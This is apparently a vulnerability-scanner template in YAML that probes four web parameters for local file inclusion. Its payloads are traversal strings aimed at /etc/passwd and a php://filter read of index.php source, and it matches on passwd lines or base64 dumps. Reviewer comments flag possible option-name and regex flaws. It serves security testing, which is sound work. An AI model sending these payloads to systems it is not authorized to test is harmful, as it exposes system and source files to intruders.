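---
# Scanner template: probes four common file-parameter endpoints for local
# file inclusion / path traversal and reports a hit when the response body
# contains /etc/passwd content or looks like a base64-encoded file dump.
id: xpl-lfi-basic

info:
  name: "Local File Inclusion (LFI)"
  author: imtaqin
  severity: high
  # The description previously said "clusterbomb", but the request below uses
  # `attack: batteringram` with a single payload list, so nothing is combined.
  description: |
    Classic path-traversal test across common vulnerable parameters.
    Uses batteringram attack: each payload from the single list is sent in turn.
  tags:
    - lfi
    - path-traversal
  reference:
    - https://owasp.org/www-community/attacks/Path_Traversal

http:
  - method: GET
    # Every path carries one {{fuzz}} placeholder, filled from payloads.fuzz.
    path:
      - "{{BaseURL}}/index.php?page={{fuzz}}"
      - "{{BaseURL}}/?file={{fuzz}}"
      - "{{BaseURL}}/download?file={{fuzz}}"
      - "{{BaseURL}}/view.php?template={{fuzz}}"
    attack: batteringram
    payloads:
      fuzz:
        - "../../../../etc/passwd"
        - "../../../../../../etc/passwd"
        - "....//....//....//etc/passwd"
        - "..%2f..%2f..%2fetc%2fpasswd"
        - "php://filter/convert.base64-encode/resource=index.php"
    # NOTE(review): the neighbouring key `matchers-condition` is hyphenated and
    # Nuclei spells this option `stop-at-first-match`; confirm the consuming
    # engine accepts the underscore form, otherwise the option may be ignored
    # and every payload is sent even after a hit.
    stop_at_first_match: true
    # Either matcher alone is enough to report a finding.
    matchers-condition: or
    matchers:
      # A root account line as it appears in /etc/passwd, with the password
      # field set to "x" or "*".
      - type: regex
        part: body
        regex:
          - "root:[x*]:0:0:"
        name: etc-passwd
      # A run of 100+ base64 characters with optional padding.
      # NOTE(review): there is no multi-line flag, so in an RE2-style engine
      # ^ and $ presumably anchor to the whole body: the matcher would fire
      # only when the response is nothing but base64 (missing an encoded file
      # embedded in a page) and would also fire on any endpoint that
      # legitimately returns a bare base64 blob. Confirm against the engine
      # and triage `base64-filter` hits by decoding the body before treating
      # them as confirmed.
      - type: regex
        part: body
        regex:
          - "^[A-Za-z0-9+/]{100,}={0,2}$"
        name: base64-filter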